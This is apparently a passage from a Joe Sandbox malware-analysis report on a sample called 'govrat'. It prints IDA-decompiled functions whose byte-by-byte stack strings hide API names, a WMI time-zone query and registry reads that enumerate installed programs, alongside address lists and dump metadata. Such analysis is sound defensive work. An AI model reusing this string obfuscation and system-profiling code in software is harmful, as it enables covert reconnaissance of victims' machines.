0x00965b58
0x00000000
0x00965b5a

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,?,00974D08), ref: 00965ADF
GetProcAddress.KERNEL32(00960300,?), ref: 00965B0F
GetProcAddress.KERNEL32(00960300,?), ref: 00965B45

Strings

ispl, xrefs: 00965AF8
rseD, xrefs: 00965AF1
cial, xrefs: 00965B29
erPa, xrefs: 00965B37
Shel, xrefs: 00965ACB
ayNa, xrefs: 00965AFF
Fold, xrefs: 00965B30
SHGe, xrefs: 00965B1B
thW, xrefs: 00965B3E
lIte, xrefs: 00965AD2
eate, xrefs: 00965AC4
SHPa, xrefs: 00965AEA
SHCr, xrefs: 00965ABD
tSpe, xrefs: 00965B22

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00963E83, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00963E83(struct HINSTANCE__* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
				_Unknown_base(*)()* _t96;
				CHAR* _t98;
				_Unknown_base(*)()* _t100;
				short _t102;
				short _t104;
				short* _t105;
				short _t106;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				short _t122;
				short _t123;
				short _t124;
				short _t126;
				short _t127;
				short _t128;
				short _t129;
				short _t130;
				short _t132;
				short _t134;
				short _t135;
				short _t136;
				signed int _t139;
				short _t142;
				short _t144;
				short _t145;
				short _t146;
				short _t148;
				short _t149;
				short _t150;
				short _t151;
				void* _t156;
				void* _t157;
				void* _t160;
				char _t169;
				void* _t174;
				short _t176;
				intOrPtr* _t178;
				short* _t179;
				void* _t180;

				_t178 = __esi;
				_t175 = __edi;
				_t174 = __edx;
				_t169 = __ebx;
				_t96 = GetProcAddress(__eax, ??); // executed
				if(_t96 == 0) {
					L3:
					_t98 = _t180 - 0x3c;
					 *((char*)(_t180 - 0x58)) = 0x47;
					 *((char*)(_t180 - 0x57)) = _t169;
					 *((intOrPtr*)(_t180 - 0x56)) = 0x636f4c74;
					 *((short*)(_t180 - 0x52)) = 0x6c61;
					 *((char*)(_t180 - 0x50)) = _t169;
					 *((intOrPtr*)(_t180 - 0x4f)) = 0x6f666e49;
					 *((short*)(_t180 - 0x4b)) = 0x57;
					_t100 = GetProcAddress(L00A0C36C(), _t98); // executed
					 *(_t180 - 8) = _t100;
					_t102 =  *(_t180 - 8)(0x400, 0x59, _t175 + 0x518, 0x10, _t98, _t180 - 0x58);
					if(_t102 == 0) {
						 *((short*)(_t175 + 0x518)) = _t102;
					}
					_t104 =  *(_t180 - 8)(0x400, 0x5a, _t175 + 0x538, 0x10);
					if(_t104 == 0) {
						 *((short*)(_t175 + 0x538)) = _t104;
					}
					 *(_t180 - 8) =  *(_t180 - 8) & 0x00000000;
					if( *((intOrPtr*)(_t180 - 0x10)) != 0) {
						_t110 = 0x53;
						 *((short*)(_t180 - 0x214)) = _t110;
						_t111 = 0x45;
						 *((short*)(_t180 - 0x212)) = _t111;
						_t112 = 0x4c;
						 *((short*)(_t180 - 0x210)) = _t112;
						_t113 = 0x45;
						 *((short*)(_t180 - 0x20e)) = _t113;
						_t114 = 0x43;
						 *((short*)(_t180 - 0x20c)) = _t114;
						_t115 = 0x54;
						 *((short*)(_t180 - 0x20a)) = _t115;
						_t116 = 0x20;
						 *((short*)(_t180 - 0x208)) = _t116;
						_t117 = 0x2a;
						 *((short*)(_t180 - 0x206)) = _t117;
						_t118 = 0x20;
						 *((short*)(_t180 - 0x204)) = _t118;
						_t119 = 0x46;
						 *((short*)(_t180 - 0x202)) = _t119;
						_t120 = 0x52;
						 *((short*)(_t180 - 0x200)) = _t120;
						_t121 = 0x4f;
						 *((short*)(_t180 - 0x1fe)) = _t121;
						_t122 = 0x4d;
						 *((short*)(_t180 - 0x1fc)) = _t122;
						_t123 = 0x20;
						 *((short*)(_t180 - 0x1fa)) = _t123;
						_t124 = 0x57;
						_t176 = 0x69;
						 *((short*)(_t180 - 0x1f8)) = _t124;
						 *((short*)(_t180 - 0x1f6)) = _t176;
						_t126 = 0x6e;
						 *((short*)(_t180 - 0x1f4)) = _t126;
						_t127 = 0x33;
						 *((short*)(_t180 - 0x1f2)) = _t127;
						_t128 = 0x32;
						 *((short*)(_t180 - 0x1f0)) = _t128;
						_t129 = 0x5f;
						 *((short*)(_t180 - 0x1ee)) = _t129;
						_t130 = 0x54;
						 *((short*)(_t180 - 0x1ec)) = _t130;
						 *((short*)(_t180 - 0x1ea)) = _t176;
						_t132 = 0x6d;
						 *((short*)(_t180 - 0x1e8)) = _t132;
						 *((short*)(_t180 - 0x1e6)) = _t169;
						_t134 = 0x5a;
						 *((short*)(_t180 - 0x1e4)) = _t134;
						_t135 = 0x6f;
						 *((short*)(_t180 - 0x1e2)) = _t135;
						_t136 = 0x6e;
						 *((short*)(_t180 - 0x1e0)) = _t136;
						 *((short*)(_t180 - 0x1de)) = _t169;
						 *((short*)(_t180 - 0x1dc)) = 0;
						_t139 = E00951195(_t174, _t176, _t178, 0x2000); // executed
						 *(_t180 - 8) = _t139;
						 *_t178(_t180 - 0x28);
						_t142 = 0x44;
						 *((short*)(_t180 - 0x1b8)) = _t142;
						 *((short*)(_t180 - 0x1b6)) = _t169;
						_t144 = 0x73;
						 *((short*)(_t180 - 0x1b4)) = _t144;
						_t145 = 0x63;
						 *((short*)(_t180 - 0x1b2)) = _t145;
						_t146 = 0x72;
						 *((short*)(_t180 - 0x1b0)) = _t146;
						 *((short*)(_t180 - 0x1ae)) = _t176;
						_t148 = 0x70;
						 *((short*)(_t180 - 0x1ac)) = _t148;
						_t149 = 0x74;
						 *((short*)(_t180 - 0x1aa)) = _t149;
						_t150 = 0x6f;
						 *((short*)(_t180 - 0x1a6)) = _t150;
						_t151 = 0x6e;
						 *((short*)(_t180 - 0x1a4)) = _t151;
						 *((short*)(_t180 - 0x1a2)) = 0;
						 *((short*)(_t180 - 0x1a8)) = _t176;
						_t156 = E0095D2FF(_t169,  *((intOrPtr*)(_t180 - 0xc)), _t178, _t180 - 0x214, _t180 - 0x1b8, _t180 - 0x28); // executed
						if(_t156 != 0 &&  *((short*)(_t180 - 0x28)) == 8) {
							L00951604( *(_t180 - 8), 0xfff,  *((intOrPtr*)(_t180 - 0x20)));
						}
						_t157 = _t180 - 0x28;
						_push(_t157);
						_push(_t157); // executed
						L009E6735(); // executed
						_t175 =  *((intOrPtr*)(_t180 - 4));
					}
					_t105 = E00951195(_t174, _t175, _t178, 0xfffe); // executed
					_t179 = _t105;
					_push(_t179);
					_push(0x7ffe);
					_push(_t105);
					_t106 = L00A17B1C(_t105);
					if(_t106 == 0) {
						 *_t179 = _t106;
					}
					_push(_t180 - 0x7c);
					_push(_t180 - 0x3c);
					 *((char*)(_t180 - 0x7c)) = 0x47;
					 *((char*)(_t180 - 0x7b)) = _t169;
					 *((intOrPtr*)(_t180 - 0x7a)) = 0x73694474;
					 *((short*)(_t180 - 0x76)) = 0x466b;
					 *((char*)(_t180 - 0x74)) = 0x72;
					 *((char*)(_t180 - 0x73)) = _t169;
					 *((char*)(_t180 - 0x72)) = _t169;
					 *((intOrPtr*)(_t180 - 0x71)) = 0x63617053;
					 *((char*)(_t180 - 0x6d)) = _t169;
					 *((intOrPtr*)(_t180 - 0x6c)) = 0x577845;
					return L009BA5CA(_t180 - 0x3c);
				} else {
					_t160 =  *_t96(0, __edi + 0x390, 4, _t180 - 0x2c); // executed
					if(_t160 != 0) {
						goto L3;
					} else {
						 *((intOrPtr*)(__edi + 0x510)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0xc));
						L00951667(__edi + 0x410, 0x40,  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x24)), 0xffffffff);
						_push(_t180 - 0x30);
						_push( *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x60)));
						return L00A122E0( *((intOrPtr*)(_t180 - 0x2c)), __edi);
					}
				}
			}

0x00963e83
0x00963e83
0x00963e83
0x00963e83
0x00963e84
0x00963e8c
0x00963ef2
0x00963ef6
0x00963efa
0x00963efe
0x00963f01
0x00963f08
0x00963f0e
0x00963f11
0x00963f18
0x00963f25
0x00963f2d
0x00963f3e
0x00963f43
0x00963f45
0x00963f45
0x00963f5c
0x00963f61
0x00963f63
0x00963f63
0x00963f6a
0x00963f72
0x00963f7a
0x00963f7d
0x00963f84
0x00963f87
0x00963f8e
0x00963f91
0x00963f98
0x00963f9b
0x00963fa2
0x00963fa5
0x00963fac
0x00963faf
0x00963fb6
0x00963fb9
0x00963fc0
0x00963fc3
0x00963fca
0x00963fcd
0x00963fd4
0x00963fd7
0x00963fde
0x00963fe1
0x00963fe8
0x00963feb
0x00963ff2
0x00963ff5
0x00963ffc
0x00963fff
0x00964006
0x00964009
0x0096400c
0x00964015
0x0096401c
0x0096401f
0x00964026
0x00964029
0x00964030
0x00964033
0x0096403a
0x0096403d
0x00964044
0x00964045
0x00964050
0x00964057
0x00964058
0x00964063
0x0096406a
0x0096406d
0x00964074
0x00964075
0x0096407e
0x0096407f
0x00964088
0x00964096
0x0096409d
0x009640a2
0x009640aa
0x009640ae
0x009640af
0x009640ba
0x009640c1
0x009640c4
0x009640cb
0x009640ce
0x009640d5
0x009640d6
0x009640e1
0x009640e8
0x009640eb
0x009640f2
0x009640f3
0x009640fc
0x009640fd
0x00964106
0x00964107
0x00964110
0x00964128
0x00964133
0x0096413d
0x00964151
0x00964156
0x00964159
0x0096415c
0x0096415d
0x0096415e
0x00964163
0x00964163
0x0096416b
0x00964171
0x00964173
0x00964174
0x00964179
0x0096417a
0x00964181
0x00964183
0x00964183
0x00964189
0x0096418d
0x0096418e
0x00964192
0x00964195
0x0096419c
0x009641a2
0x009641a6
0x009641a9
0x009641ac
0x009641b3
0x009641b6
0x009641c2
0x00963e8e
0x00963e9d
0x00963ea1
0x00000000
0x00963ea3
0x00963ea9
0x00963ec0
0x00963ecb
0x00963ecf
0x00963ed7
0x00963ed7
0x00963ea1

APIs

GetProcAddress.KERNEL32 ref: 00963E84
GetProcAddress.KERNEL32(00000000,?), ref: 00963F25

Strings

Info, xrefs: 00963F11
kF, xrefs: 0096419C
r, xrefs: 009641A2
Spac, xrefs: 009641AC
G, xrefs: 0096418E
ExW, xrefs: 009641B6
tDis, xrefs: 00964195
G, xrefs: 00963EFA
W, xrefs: 00963F18
tLoc, xrefs: 00963F01
al, xrefs: 00963F08

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00963ED8, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 218
library

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00963F25

Strings

Info, xrefs: 00963F11
kF, xrefs: 0096419C
r, xrefs: 009641A2
Spac, xrefs: 009641AC
G, xrefs: 0096418E
ExW, xrefs: 009641B6
tDis, xrefs: 00964195
G, xrefs: 00963EFA
W, xrefs: 00963F18
tLoc, xrefs: 00963F01
al, xrefs: 00963F08

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095355D, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0095355D(struct HINSTANCE__* __eax, void* __ebx, void* __ecx, void* __esi) {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t3;
				_Unknown_base(*)()* _t4;
				void* _t11;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t16;

				_t11 = __ecx;
				_t12 = __eax;
				if(__eax != 0) {
					_t2 = GetProcAddress(__eax, "FlsAlloc"); // executed
					 *0x9738d4 = _t2; // executed
					_t3 = GetProcAddress(_t12, "FlsGetValue"); // executed
					 *0x9738d8 = _t3; // executed
					_t4 = GetProcAddress(_t12, "FlsSetValue"); // executed
					 *0x9738dc = _t4; // executed
					_t5 = GetProcAddress(_t12, "FlsFree"); // executed
					_t16 =  *0x96c194;
					 *0x9738e0 = _t5;
					if( *0x9738d4 == 0 ||  *0x9738d8 == 0 ||  *0x9738dc == 0 || _t5 == 0) {
						 *0x9738d8 =  *0x96c198;
						_t5 =  *0x96c190;
						 *0x9738d4 = 0x95325f;
						 *0x9738dc = _t16;
						 *0x9738e0 =  *0x96c190;
					}
					return L00A01E19(_t5, _t11);
				}
				L0095329C(__ebx);
				return 0;
			}

0x0095355d
0x0095355d
0x00953561
0x00953579
0x00953581
0x00953586
0x0095358e
0x00953593
0x0095359b
0x009535a0
0x009535a9
0x009535af
0x009535b4
0x009535d1
0x009535d6
0x009535db
0x009535e5
0x009535eb
0x009535eb
0x00000000
0x009535f0
0x00953563
0x0095356b

APIs

GetProcAddress.KERNEL32(?,FlsAlloc), ref: 00953579
GetProcAddress.KERNEL32(?,FlsGetValue,?,FlsAlloc), ref: 00953586
GetProcAddress.KERNEL32(?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 00953593
GetProcAddress.KERNEL32(?,FlsFree,?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 009535A0

Part of subcall function 0095329C: TlsFree.KERNEL32(00000016), ref: 009532C7

Strings

FlsGetValue, xrefs: 0095357B
FlsSetValue, xrefs: 00953588
FlsFree, xrefs: 00953595
FlsAlloc, xrefs: 00953573

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00960EDD, Relevance: 10.6, APIs: 7, Instructions: 140

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00960EDD(intOrPtr __eax, struct _SECURITY_ATTRIBUTES* __ebx, void* __edx, long __edi, intOrPtr* __esi) {
				signed char _t47;
				void* _t49;
				void* _t51;
				struct _SECURITY_ATTRIBUTES* _t52;
				void* _t63;
				struct _SECURITY_ATTRIBUTES* _t70;
				signed char _t71;
				void* _t73;
				void* _t75;
				struct _SECURITY_ATTRIBUTES* _t80;
				void* _t84;
				void* _t87;
				void* _t89;
				long _t90;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;
				void* _t96;

				_t92 = __esi;
				_t90 = __edi;
				_t89 = __edx;
				_t80 = __ebx;
				 *((intOrPtr*)(_t96 - 0x10)) = __eax;
				_t47 = 0x60000a -  *((intOrPtr*)(_t96 - 0x10));
				 *(_t96 + 8) = 0x60000a;
				if((_t47 & 0x00000007) != 0) {
					do {
						_t47 = _t47 + 1;
					} while ((_t47 & 0x00000007) != 0);
					 *(_t96 + 8) = _t47;
				}
				_t106 = _t47 - _t80;
				if(_t47 <= _t80) {
					CloseHandle( *(_t96 - 8));
				} else {
					_t51 = E009602B6(0x974f18, _t106);
					_push( *(_t96 + 8));
					if(_t51 != 0) {
						_t52 = E0095DD70(_t89, _t90, _t96);
						_push(_t96 - 0x10);
						_push( *(_t96 + 8));
						 *(_t96 - 0xc) = _t52;
						_push(_t52);
						 *(_t96 + 8) = L0095DC6C(_t80, _t90, _t92,  *(_t96 - 8));
						L0095C788(_t96 - 0x10, _t89, _t92,  *(_t96 - 0xc));
						__eflags =  *(_t96 + 8) - _t80;
						if( *(_t96 + 8) != _t80) {
							CloseHandle( *(_t96 - 8));
							 *((short*)(_t96 - 0x2cc)) = 0;
							L00958BA0(_t96 - 0x2ca, _t80, 0x206);
							_push(_t96 - 0x2cc);
							L0095F4BA(_t80, _t90, _t92);
							_pop(_t84);
							_t94 =  *_t92(_t96 - 0x2cc, 0xc0000000, 3, _t80, 4, _t90, _t80);
							__eflags = _t94 - 0xffffffff;
							if(__eflags != 0) {
								_push(_t80);
								_t63 = _t96 - 0xc;
								_push(_t63);
								_push( *((intOrPtr*)(_t96 - 0x10)));
								 *(_t96 - 0xc) = _t80;
								_push( *(_t96 + 8));
								_push(_t94);
								_push(_t63);
								L00995FEF(_t63, _t80, __eflags);
								CloseHandle(_t94);
								_push(_t96 + 8);
								_push( *(_t96 - 0x14));
								_push(_t96 - 0x2cc);
								L009621C1(_t80, _t84, _t89, _t90, _t94, __eflags);
								L00961F7B(_t80, _t89, _t90, _t94, __eflags,  *(_t96 + 8));
								ExitProcess(_t80);
							}
						}
					} else {
						 *(_t96 - 0xa4) = _t80;
						_t70 = E0095DD70(_t89, _t90, _t96);
						_t87 = _t96 - 0x10;
						_push(_t87);
						_push( *(_t96 + 8));
						 *(_t96 - 0xc) = _t70;
						_push(_t70);
						_t71 = L0095DC6C(_t80, _t90, _t92,  *(_t96 - 8)); // executed
						 *(_t96 + 8) = _t71;
						CloseHandle( *(_t96 - 8));
						_t73 = CreateFileW( *(_t96 - 0x14), 2, 3, _t80, 3, _t90, _t80); // executed
						_t95 = _t73;
						if( *(_t96 + 8) != _t80) {
							_push(_t80);
							_push(_t80);
							_push(_t80);
							_push(_t95);
							_push(_t90); // executed
							_t75 = L009D3C0F(_t73); // executed
							_t109 = _t75 - 0xffffffff;
							if(_t75 != 0xffffffff) {
								_push(_t80);
								_push(_t96 - 0xa4);
								_push( *((intOrPtr*)(_t96 - 0x10)));
								_push( *(_t96 + 8));
								_push(_t95);
								_push(_t87); // executed
								L009E4037(_t96 - 0xa4, _t87, _t95, _t109); // executed
								CloseHandle(_t95);
							}
							L0095C788(_t87, _t89, _t95,  *(_t96 + 8)); // executed
							_pop(_t87);
						}
						L0095C788(_t87, _t89, _t95,  *(_t96 - 0xc)); // executed
					}
				}
				_t49 = 0x2b;
				return _t49;
			}

0x00960edd
0x00960edd
0x00960edd
0x00960edd
0x00960edd
0x00960ee5
0x00960ee8
0x00960eed
0x00960eef
0x00960eef
0x00960ef0
0x00960ef4
0x00960ef4
0x00960ef7
0x00960ef9
0x0096105e
0x00960eff
0x00960f04
0x00960f09
0x00960f0e
0x00960f99
0x00960fa2
0x00960fa3
0x00960fa6
0x00960fa9
0x00960fb5
0x00960fb8
0x00960fc0
0x00960fc3
0x00960fcc
0x00960fd9
0x00960fe8
0x00960ff6
0x00960ff7
0x00960ffc
0x00961012
0x00961014
0x00961017
0x00961019
0x0096101a
0x0096101d
0x0096101e
0x00961021
0x00961024
0x00961027
0x00961028
0x00961029
0x0096102f
0x00961038
0x00961039
0x00961042
0x00961043
0x0096104e
0x00961055
0x00961055
0x00961017
0x00960f14
0x00960f14
0x00960f1a
0x00960f20
0x00960f23
0x00960f24
0x00960f27
0x00960f2a
0x00960f2e
0x00960f39
0x00960f3c
0x00960f4e
0x00960f50
0x00960f55
0x00960f57
0x00960f58
0x00960f59
0x00960f5a
0x00960f5b
0x00960f5c
0x00960f61
0x00960f64
0x00960f66
0x00960f6d
0x00960f6e
0x00960f71
0x00960f74
0x00960f75
0x00960f76
0x00960f7c
0x00960f7c
0x00960f85
0x00960f8a
0x00960f8a
0x00960f8e
0x00960f93
0x00960f0e
0x00961066
0x0096106b

APIs

CloseHandle.KERNEL32(?), ref: 00960F3C
CreateFileW.KERNEL32(?,00000002,00000003,?,00000003), ref: 00960F4E
CloseHandle.KERNEL32(00000000), ref: 00960F7C
CloseHandle.KERNEL32(?), ref: 00960FCC
CloseHandle.KERNEL32(00000000), ref: 0096102F

Part of subcall function 00961F7B: SendMessageW.USER32(00000402,00000000,00000000,00000000), ref: 0096212D

ExitProcess.KERNEL32 ref: 00961055
CloseHandle.KERNEL32(?), ref: 0096105E

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095D775, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0095D775(void* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _t118;
				void* _t119;
				void* _t121;

				_t119 = __edi;
				_t118 = __ebx;
				_t113 = __eax;
				if(__eax == 0) {
					__eax = 0x50;
					 *(__ebp - 0x98) = __ax;
					__eax = 0x61;
					 *(__ebp - 0x96) = __ax;
					__eax = 0x72;
					 *(__ebp - 0x94) = __ax;
					__eax = 0x65;
					 *(__ebp - 0x92) = __ax;
					__eax = 0x6e;
					 *(__ebp - 0x90) = __ax;
					__eax = 0x74;
					 *(__ebp - 0x8e) = __ax;
					__eax = 0x4b;
					 *(__ebp - 0x8c) = __ax;
					__eax = 0x65;
					 *(__ebp - 0x8a) = __ax;
					__eax = 0x79;
					 *(__ebp - 0x88) = __ax;
					__eax = 0x4e;
					 *(__ebp - 0x86) = __ax;
					__eax = 0x61;
					 *(__ebp - 0x84) = __ax;
					__eax = 0x6d;
					 *(__ebp - 0x82) = __ax;
					__eax = 0x65;
					 *(__ebp - 0x80) = __ax;
					__eax = 0;
					 *(__ebp - 0x7e) = __ax;
					__eax = __ebp - 0x98;
					__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x98, __ebx, __ebx, __ebx, __ebx); // executed
					if(__eax != 0) {
						__eax = 0x53;
						 *(__ebp - 0xd8) = __ax;
						__eax = 0x79;
						 *(__ebp - 0xd6) = __ax;
						__eax = 0x73;
						 *(__ebp - 0xd4) = __ax;
						__eax = 0x74;
						 *(__ebp - 0xd2) = __ax;
						__eax = 0x65;
						 *(__ebp - 0xd0) = __ax;
						__eax = 0x6d;
						 *(__ebp - 0xce) = __ax;
						__eax = 0x43;
						 *(__ebp - 0xcc) = __ax;
						__eax = 0x6f;
						 *(__ebp - 0xca) = __ax;
						__eax = 0x6d;
						 *(__ebp - 0xc8) = __ax;
						__eax = 0x70;
						 *(__ebp - 0xc6) = __ax;
						__eax = 0x6f;
						 *(__ebp - 0xc4) = __ax;
						__eax = 0x6e;
						 *(__ebp - 0xc2) = __ax;
						__eax = 0x65;
						 *(__ebp - 0xc0) = __ax;
						__eax = 0x6e;
						 *(__ebp - 0xbe) = __ax;
						__eax = 0x74;
						 *(__ebp - 0xbc) = __ax;
						__eax = 0;
						 *(__ebp - 0xba) = __ax;
						__ebp - 0xc = __ebp - 0x148;
						__eax = __ebp - 0xd8;
						 *(__ebp - 0xc) = 4;
						__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xd8, __ebx, __ebx, __ebp - 0x148, __ebp - 0xc); // executed
						if(__eax != 0 ||  *(__ebp - 0x148) != 1) {
							__eax = 0x44;
							 *(__ebp - 0x7c) = __ax;
							__eax = 0x69;
							 *(__ebp - 0x7a) = __ax;
							__eax = 0x73;
							 *(__ebp - 0x78) = __ax;
							__eax = 0x70;
							 *(__ebp - 0x76) = __ax;
							__eax = 0x6c;
							 *(__ebp - 0x74) = __ax;
							__eax = 0x61;
							 *(__ebp - 0x72) = __ax;
							__eax = 0x79;
							 *(__ebp - 0x70) = __ax;
							__eax = 0x4e;
							 *(__ebp - 0x6e) = __ax;
							__eax = 0x61;
							 *(__ebp - 0x6c) = __ax;
							__eax = 0x6d;
							 *(__ebp - 0x6a) = __ax;
							__eax = 0x65;
							 *(__ebp - 0x68) = __ax;
							__eax = 0;
							 *(__ebp - 0x66) = __ax;
							__ebp - 0xc = __ebp - 0x24c;
							__eax = __ebp - 0x7c;
							 *(__ebp - 0xc) = __edi;
							__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x7c, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
							if(__eax == 0) {
								__ebp - 0x24c = __ebp - 0x44c;
								__eax = L00951667(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff);
								__eax = 0x44;
								 *(__ebp - 0xb8) = __ax;
								__eax = 0x69;
								 *(__ebp - 0xb6) = __ax;
								__eax = 0x73;
								 *(__ebp - 0xb4) = __ax;
								__eax = 0x70;
								 *(__ebp - 0xb2) = __ax;
								__eax = 0x6c;
								 *(__ebp - 0xb0) = __ax;
								__eax = 0x61;
								 *(__ebp - 0xae) = __ax;
								__eax = 0x79;
								 *(__ebp - 0xac) = __ax;
								__eax = 0x56;
								 *(__ebp - 0xaa) = __ax;
								__eax = 0x65;
								 *(__ebp - 0xa8) = __ax;
								__eax = 0x72;
								 *(__ebp - 0xa6) = __ax;
								__eax = 0x73;
								 *(__ebp - 0xa4) = __ax;
								__eax = 0x69;
								 *(__ebp - 0xa2) = __ax;
								__eax = 0x6f;
								 *(__ebp - 0xa0) = __ax;
								__eax = 0x6e;
								 *(__ebp - 0x9e) = __ax;
								__eax = 0;
								 *(__ebp - 0x9c) = __ax;
								__ebp - 0xc = __ebp - 0x24c;
								__eax = __ebp - 0xb8;
								 *(__ebp - 0xc) = __edi;
								__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xb8, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
								if(__eax == 0) {
									__ebp - 0x44c = L00951F39(__ebp - 0x44c, __edi, L"   (", 0xffffffff);
									__ebp - 0x24c = __ebp - 0x44c;
									L00951F39(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff) = __ebp - 0x44c;
									__eax = L00951F39(__ebp - 0x44c, __edi, 0x9706d4, 0xffffffff);
								}
								__ebp - 0x44c = L00951F39(__ebp - 0x44c, __edi, "\n", 0xffffffff);
								__eax =  *(__ebp - 8);
								if(__eax != __ebx) {
									__edx = __eax + 2;
									do {
										__cx =  *__eax;
										__eax = __eax + 2;
									} while (__cx != __bx);
									__eax = __eax - __edx;
									__ecx = __eax;
									__eax = __ebp - 0x44c;
									__edx = __eax + 2;
									 *(__ebp + 8) = __eax + 2;
									do {
										__dx =  *__eax;
										__eax = __eax + 2;
									} while (__dx != __bx);
									__eax = __eax -  *(__ebp + 8);
									__eax = __eax >> 1;
									__eax = __eax + __ecx;
									 *(__ebp + 8) = __eax;
									__eax = L00951D71(__edi, __esi,  *(__ebp - 8), __eax); // executed
									_pop(__ecx);
									_pop(__ecx);
									 *(__ebp - 8) = __eax;
								} else {
									__eax = __ebp - 0x44c;
									__edx = __eax + 2;
									do {
										__cx =  *__eax;
										__eax = __eax + 2;
									} while (__cx != __bx);
									__eax = __eax - __edx;
									__eax = __eax >> 1;
									 *(__ebp + 8) = __eax;
									 *(__ebp - 8) = __eax;
									__eax = L00958BA0(__eax, __ebx,  *(__ebp + 8));
								}
								__eax = __ebp - 0x44c;
								__edx = __eax + 2;
								do {
									__cx =  *__eax;
									__eax = __eax + 2;
								} while (__cx != __bx);
								__ebp - 0x44c =  *(__ebp + 8);
								__eax =  *(__ebp + 8) >> 1;
								__eax = L00951F39( *(__ebp - 8),  *(__ebp + 8) >> 1, __ebp - 0x44c,  *(__ebp + 8) >> 1);
							}
						}
					}
				}
				if( *((intOrPtr*)(_t121 - 0x10)) != _t118) {
					_push( *((intOrPtr*)(_t121 - 0x10)));
					return L0099F7C9(_t113);
				}
				_push(_t118);
				_push(_t118);
				_push(_t118);
				_push(_t118);
				_push(_t121 - 0xc);
				_push(_t121 - 0x24c);
				_push( *((intOrPtr*)(_t121 - 0x24)));
				 *((intOrPtr*)(_t121 - 0xc)) = 0x80;
				_push( *((intOrPtr*)(_t121 - 0x2c)));
				return L0099BA8E(_t121 - 0x24c, _t119);
				goto L23;
			}

0x0095d775
0x0095d775
0x0095d775
0x0095d777
0x0095d77b
0x0095d77e
0x0095d785
0x0095d788
0x0095d78f
0x0095d792
0x0095d799
0x0095d79c
0x0095d7a3
0x0095d7a6
0x0095d7ad
0x0095d7b0
0x0095d7b7
0x0095d7ba
0x0095d7c1
0x0095d7c4
0x0095d7cb
0x0095d7ce
0x0095d7d5
0x0095d7d8
